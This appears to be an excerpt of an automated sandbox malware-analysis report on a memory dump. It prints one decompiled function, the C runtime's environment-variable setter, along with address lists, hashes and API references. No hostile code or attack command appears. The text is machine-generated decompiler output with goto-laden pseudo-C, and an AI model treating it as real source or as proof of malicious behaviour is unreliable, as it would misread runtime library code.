_free.LIBCMT ref: 0043E095
_free.LIBCMT ref: 0043E0A3

Strings

\^)|/, xrefs: 0043DD64

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID: \^)|/
API String ID: 2509303402-265608074
Opcode ID: d2b6c820afacec0ce81ed1a83fda5600315aacae1acea7def1cf422fd7d90890
Instruction ID: 7711d0e5447a7cd88c18e030f335ffaa979ad0af56ac34f039c773c9d791d5f6
Opcode Fuzzy Hash: d2b6c820afacec0ce81ed1a83fda5600315aacae1acea7def1cf422fd7d90890
Instruction Fuzzy Hash: EEB1AEB1D012059EDB10DFAAC881BEEBBF4BF0D304F14506EF495A7282D77998459B68

Uniqueness

Uniqueness Score: -1.00%

Function 00445D8D, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00445D8D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00434610(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00439BAF())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46a4d0; // 0x484400
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46a4dc; // 0x484400
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46a4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00446435(_t298);
												E0043E9A5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E0043E9A5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00446435(_t298);
											E0043E9A5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46a4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0043DAF9(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E0043E9A5(_t300);
												goto L12;
											} else {
												_t131 = E004400C6(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043603A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00450397(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00439BAF())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46a4d4; // 0x484210
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46a4d8; // 0x488310
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46a4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E004463C8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00446435(_t302);
																					E0043E9A5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E0043E9A5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00446435(_t302);
																				E0043E9A5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46a4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0043DAF9(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E0043E9A5(_t304);
																					goto L56;
																				} else {
																					_t148 = E0043FD84(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043603A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E0043DAF9(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043E0FA(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E0043E9A5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E0043DAF9(_t262, _t95, 1);
																										E0043E9A5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E004400C6( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043603A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E0043DAF9(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043E0FA(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E0043E9A5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E0043DAF9(_t267 - _t284 >> 1, _t107, 2);
																																E0043E9A5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E0043FD84( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043603A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46a4d0; // 0x484400
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00442C73(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00439BAF();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46a4d0; // 0x484400
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46a4d4 = E0043DAF9(_t246, 1, 4);
																				E0043E9A5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46a4d0 = E0043DAF9(_t246, 1, 4);
																				E0043E9A5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46a4d0 - _t221; // 0x484400
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46a4d4; // 0x484210
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043BDD6(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46a4d4; // 0x484210
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E0043E9A5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00439BAF();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00439BAF();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46a4d0 = E0043DAF9(_t231, 1, 4);
										E0043E9A5(_t218);
										_t298 =  *0x46a4d0; // 0x484400
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46a4d4 - _t218; // 0x484210
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46a4d4 = E0043DAF9(_t231, 1, 4);
												E0043E9A5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46a4d4 - _t218; // 0x484210
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46a4d4 - _t218; // 0x484210
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043BDD1(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46a4d0; // 0x484400
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E0043E9A5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00439BAF();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x00445d96
0x00445d9b
0x00445db2
0x00445db4
0x00445db9
0x00445dbd
0x00445dbe
0x00445dc0
0x00445e10
0x00445e15
0x00000000
0x00445dc2
0x00445dc2
0x00445dc4
0x00000000
0x00445dc6
0x00445dc6
0x00445dca
0x00445dd0
0x00445dd3
0x00445dd6
0x00445ddc
0x00445ddf
0x00445de4
0x00445de6
0x00445de9
0x00445dea
0x00445dea
0x00445df0
0x00445df2
0x00445df4
0x00445e88
0x00445e8b
0x00445e8d
0x00445e8f
0x00445e90
0x00445e91
0x00445e96
0x00445e9b
0x00445e9d
0x00445ee7
0x00445ee7
0x00445eea
0x00000000
0x00445ef0
0x00445ef0
0x00445ef2
0x00445ef5
0x00445ef5
0x00445ef8
0x00445efa
0x00000000
0x00445f00
0x00445f00
0x00445f06
0x00000000
0x00445f0c
0x00445f0c
0x00445f0e
0x00445f16
0x00445f18
0x00445f1d
0x00445f20
0x00445f22
0x00000000
0x00445f28
0x00445f28
0x00445f2b
0x00445f2d
0x00445f30
0x00445f33
0x00000000
0x00445f33
0x00445f22
0x00445f06
0x00445efa
0x00445e9f
0x00445e9f
0x00445ea1
0x00000000
0x00445ea3
0x00445ea6
0x00445eac
0x00445eaf
0x00445eb2
0x00445ec6
0x00445ec6
0x00445ec9
0x00000000
0x00000000
0x00445ec2
0x00445ec5
0x00445ec5
0x00445ec5
0x00445ecb
0x00445ecd
0x00445ed5
0x00445ed7
0x00445edc
0x00445edf
0x00445ee1
0x00445ee3
0x00445f37
0x00445f37
0x00445f37
0x00445eb4
0x00445eb4
0x00445eb7
0x00445eb9
0x00445eb9
0x00445f3d
0x00445f40
0x00000000
0x00445f46
0x00445f46
0x00445f48
0x00445f4b
0x00445f4b
0x00445f4d
0x00445f4e
0x00445f4e
0x00445f5a
0x00445f62
0x00445f65
0x00445f66
0x00445f68
0x00445fb1
0x00445fb2
0x00000000
0x00445f6a
0x00445f71
0x00445f76
0x00445f79
0x00445f7b
0x00445fbd
0x00445fbe
0x00445fbf
0x00445fc0
0x00445fc1
0x00445fc2
0x00445fc7
0x00445fcb
0x00445fcd
0x00445fd0
0x00445fd1
0x00445fd4
0x00445fd6
0x00445fe8
0x00445fe9
0x00445fea
0x00445fed
0x00445fef
0x00445ff4
0x00445ff8
0x00445ff9
0x00445ffb
0x0044604c
0x00446051
0x00000000
0x00445ffd
0x00445ffd
0x00445fff
0x00000000
0x00446001
0x00446001
0x00446007
0x00446009
0x0044600d
0x00446010
0x00446013
0x00446019
0x0044601b
0x0044601c
0x00446022
0x00446025
0x00446027
0x00446027
0x0044602d
0x0044602f
0x004460bc
0x004460c7
0x004460ca
0x004460cf
0x004460d4
0x004460d6
0x00446120
0x00446120
0x00446123
0x00000000
0x00446129
0x00446129
0x0044612b
0x0044612e
0x0044612e
0x00446131
0x00446133
0x00000000
0x00446139
0x00446139
0x0044613f
0x00000000
0x00446145
0x00446145
0x00446147
0x0044614f
0x00446151
0x00446156
0x00446159
0x0044615b
0x00000000
0x00446161
0x00446161
0x00446164
0x00446166
0x00446169
0x0044616c
0x00000000
0x0044616c
0x0044615b
0x0044613f
0x00446133
0x004460d8
0x004460d8
0x004460da
0x00000000
0x004460dc
0x004460df
0x004460e5
0x004460e8
0x004460eb
0x004460ff
0x004460ff
0x00446102
0x00000000
0x00000000
0x004460fb
0x004460fe
0x004460fe
0x004460fe
0x00446104
0x00446106
0x0044610e
0x00446110
0x00446115
0x00446118
0x0044611a
0x0044611c
0x00446170
0x00446170
0x00446170
0x004460ed
0x004460ed
0x004460f0
0x004460f2
0x004460f2
0x00446176
0x00446179
0x00000000
0x0044617f
0x0044617f
0x00446181
0x00446181
0x00446184
0x00446184
0x00446187
0x0044618a
0x0044618a
0x00446195
0x00446199
0x004461a1
0x004461a4
0x004461a5
0x004461a7
0x004461ee
0x004461ef
0x00000000
0x004461a9
0x004461b1
0x004461b6
0x004461b9
0x004461bb
0x004461fa
0x004461fb
0x004461fc
0x004461fd
0x004461fe
0x004461ff
0x00446204
0x00446207
0x00446208
0x0044620b
0x0044620c
0x0044620f
0x00446211
0x0044621a
0x0044621c
0x0044621e
0x00446220
0x00446222
0x00446222
0x00446225
0x00446226
0x00446226
0x00446222
0x0044622c
0x00446237
0x0044623a
0x0044623b
0x0044623d
0x004462a4
0x004462a4
0x00000000
0x0044623f
0x0044623f
0x00446242
0x00446294
0x00446296
0x0044629c
0x00000000
0x00446244
0x00446244
0x00446247
0x00446247
0x00446249
0x00446249
0x0044624b
0x0044624b
0x0044624e
0x0044624e
0x00446250
0x00446251
0x00446251
0x00446255
0x00446259
0x0044625d
0x00446267
0x0044626a
0x0044626f
0x00446272
0x00446276
0x00000000
0x00446278
0x00446280
0x00446285
0x00446288
0x0044628a
0x004462a9
0x004462ab
0x004462ac
0x004462ad
0x004462ae
0x004462af
0x004462b0
0x004462b5
0x004462b8
0x004462b9
0x004462bb
0x004462bc
0x004462bd
0x004462be
0x004462c1
0x004462c3
0x004462cc
0x004462cd
0x004462cf
0x004462d1
0x004462d3
0x004462d6
0x004462d7
0x004462d9
0x004462db
0x004462db
0x004462de
0x004462df
0x004462df
0x004462db
0x004462e3
0x004462ee
0x004462f2
0x004462f4
0x00446362
0x00446362
0x00000000
0x004462f6
0x004462f6
0x004462f8
0x00446352
0x00446353
0x00446359
0x00000000
0x004462fa
0x004462fc
0x004462fc
0x004462fe
0x004462fe
0x00446300
0x00446300
0x00446303
0x00446303
0x00446306
0x00446309
0x00446309
0x00446315
0x00446319
0x00446321
0x00446327
0x0044632c
0x0044632f
0x00446333
0x00000000
0x00446335
0x0044633d
0x00446342
0x00446345
0x00446347
0x00446367
0x00446369
0x0044636a
0x0044636b
0x0044636c
0x0044636d
0x0044636e
0x00446373
0x00446376
0x00446379
0x0044637a
0x0044637b
0x0044637c
0x00446382
0x00446384
0x00446387
0x004463b3
0x004463b3
0x004463b3
0x004463b8
0x00446389
0x00446389
0x0044638c
0x00446392
0x00446397
0x0044639a
0x0044639c
0x00000000
0x0044639e
0x004463a0
0x004463a3
0x004463a5
0x004463c1
0x004463c3
0x004463a7
0x004463a7
0x004463a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004463a9
0x004463a5
0x00000000
0x004463ab
0x004463ab
0x004463ae
0x004463ae
0x00000000
0x0044638c
0x004463ba
0x004463c0
0x00000000
0x00000000
0x00000000
0x00446347
0x00000000
0x00446349
0x00446349
0x0044634c
0x0044634c
0x00446350
0x00446350
0x00000000
0x00446350
0x004462f8
0x004462c5
0x004462c5
0x0044635d
0x00446361
0x00446361
0x00000000
0x00000000
0x00000000
0x0044628a
0x00000000
0x0044628c
0x0044628c
0x0044628f
0x0044628f
0x00000000
0x00446293
0x00446242
0x00446213
0x00446213
0x0044629f
0x004462a3
0x004462a3
0x004461bd
0x004461c1
0x004461c4
0x004461ce
0x004461d6
0x004461dc
0x004461de
0x004461e0
0x004461e5
0x004461e5
0x004461e8
0x004461e8
0x00000000
0x004461de
0x004461bb
0x004461a7
0x00446179
0x004460da
0x00446035
0x00446035
0x0044603a
0x0044603d
0x0044606a
0x0044606a
0x0044606c
0x00000000
0x0044606e
0x0044606e
0x00446070
0x0044609b
0x004460a5
0x004460aa
0x004460af
0x00000000
0x00446072
0x0044607c
0x00446081
0x00446086
0x00446089
0x0044608f
0x00000000
0x00446091
0x00446091
0x00446097
0x00446099
0x00000000
0x00000000
0x00000000
0x00000000
0x00446099
0x0044608f
0x00446070
0x0044603f
0x0044603f
0x00446041
0x00000000
0x00446043
0x00446043
0x00446048
0x0044604a
0x004460b2
0x004460b2
0x004460b8
0x004460ba
0x00446057
0x00446057
0x00446057
0x0044605a
0x0044605b
0x00446062
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044604a
0x00446041
0x0044603d
0x0044602f
0x00445fff
0x00445fd8
0x00445fd8
0x00445fdd
0x00445fe3
0x00446065
0x00446069
0x00446069
0x00445f7d
0x00445f86
0x00445f8e
0x00445f92
0x00445f99
0x00445f9f
0x00445fa1
0x00445fa3
0x00445fa8
0x00445fa8
0x00445fab
0x00445fab
0x00000000
0x00445fa1
0x00445f7b
0x00445f68
0x00445f40
0x00445ea1
0x00445dfa
0x00445dfa
0x00445dfd
0x00445e2e
0x00445e2e
0x00445e30
0x00445e40
0x00445e45
0x00445e4a
0x00445e50
0x00445e53
0x00445e55
0x00000000
0x00445e57
0x00445e57
0x00445e5d
0x00000000
0x00445e5f
0x00445e69
0x00445e6e
0x00445e73
0x00445e76
0x00445e7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00445e7c
0x00445e5d
0x00445e32
0x00445e32
0x00000000
0x00445e32
0x00445dff
0x00445dff
0x00445e05
0x00000000
0x00445e07
0x00445e07
0x00445e0c
0x00445e0e
0x00445e7e
0x00445e7e
0x00445e84
0x00445e84
0x00445e86
0x00445e1b
0x00445e1b
0x00445e1b
0x00445e1e
0x00445e1f
0x00445e26
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00445e0e
0x00445e05
0x00445dfd
0x00445df4
0x00445dc4
0x00445d9d
0x00445d9d
0x00445da2
0x00445da8
0x00445e29
0x00445e2d
0x00445e2d
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00445DB4
_free.LIBCMT ref: 00445E1F
_free.LIBCMT ref: 00445E45
_free.LIBCMT ref: 00445E6E
_free.LIBCMT ref: 00445EA6
_free.LIBCMT ref: 00445ED7
_free.LIBCMT ref: 00445F18
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00445F99
_free.LIBCMT ref: 00445FB2
_wcschr.LIBVCRUNTIME ref: 00445FEF
_free.LIBCMT ref: 0044605B
_free.LIBCMT ref: 00446081
_free.LIBCMT ref: 004460AA
_free.LIBCMT ref: 004460DF
_free.LIBCMT ref: 00446110
_free.LIBCMT ref: 00446151
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461D6
_free.LIBCMT ref: 004461EF

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
